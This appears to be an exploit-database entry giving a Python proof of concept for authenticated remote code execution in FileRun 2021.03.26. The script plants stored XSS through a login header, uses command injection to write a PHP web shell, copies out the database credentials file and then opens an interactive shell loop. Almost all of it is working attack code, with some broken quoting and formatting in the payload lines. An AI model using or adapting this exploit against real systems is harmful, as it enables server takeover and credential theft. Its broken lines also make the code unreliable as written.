Exploit/Advisories

# Exploit Title: Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated)
# Date: 09/21/2021
# Exploit Author: syntegris information solutions GmbH
# Credits: Christian P.
# Vendor Homepage: https://filerun.com
# Software Link: https://f.afian.se/wl/?id=SkPwYC8dOcMIDWohmyjOqAgdqhRqCZ3X&fmode=download&recipient=d3d3LmZpbGVydW4uY29t
# Version: 2021.03.26
# Tested on: official docker image

# PoC for exploiting a chain of a stored XSS and authenticated Remote Code Execution
import requests
import time
import sys

# this is the plain version of the payload below
"""
var xmlhttp = new XMLHttpRequest();
var url = '/?module=cpanel§ion=settings&page=image_preview&action=checkImageMagick'
var payload = "echo '< ?php echo shell_exec($_REQUEST['cmd']); ?>' > shell.php #";
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == XMLHttpRequest.DONE) {
if (xmlhttp.status == 200) {
console.log(xmlhttp.responseText);
}
}
};
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("mode=exec&path=convert|"+payload);
"""

if not len(sys.argv) == 2:
print("missing target url")
sys.exit(1)

target = sys.argv[1]

def inject_code():
payload = "var xmlhttp = new XMLHttpRequest(); var url = '/?module=cpanel&section=settings&page=image_preview&action=checkImageMagick' var payload = "echo '< ?php echo shell_exec($_REQUEST[\'cmd\']); ?>' > shell.php #"; xmlhttp.onreadystatechange = function() { if (xmlhttp.readyState == XMLHttpRequest.DONE) { if (xmlhttp.status == 200) { console.log(xmlhttp.responseText); } else if (xmlhttp.status == 400) { alert('There was an error 400'); } else { alert('something else other than 200 was returned'); } } }; xmlhttp.open("POST", url, true); xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlhttp.send("mode=exec&path=convert|"
req = requests.post(
"%s/?module=fileman&page=login&action=login" % target,
data={'username': 'nonexistend', 'password': 'wrong', 'otp':'',
'two_step_secret':'','language':''}, headers={'X-Forwarded-For': '' % payload}
)

def check_shell_exists():
req = requests.get("%s/shell.php" % target)
if req.status_code != 200:
return False
return True

def process_command(command):
req = requests.get("%s/shell.php?cmd=%s" % (target, command))
print(req.text)

while True:
print("Injecting new log message...")
inject_code()
time.sleep(10)
if check_shell_exists():
print("Shell exists under '%s/shell.php?cmd=ls'" % target)
break
print("Lets get autoconfig.php which contains database credentials...")
process_command("cp system/data/autoconfig.php js/autoconfig.txt")

ac_resp = requests.get("%s/js/autoconfig.txt" % target)
with open("filerun.autoconfig.php", "wb") as ac_f:
ac_f.write(ac_resp.content)
process_command("rm js/autoconfig.php")

while True:
command = input("Command:")
process_command(command)

Comments are closed.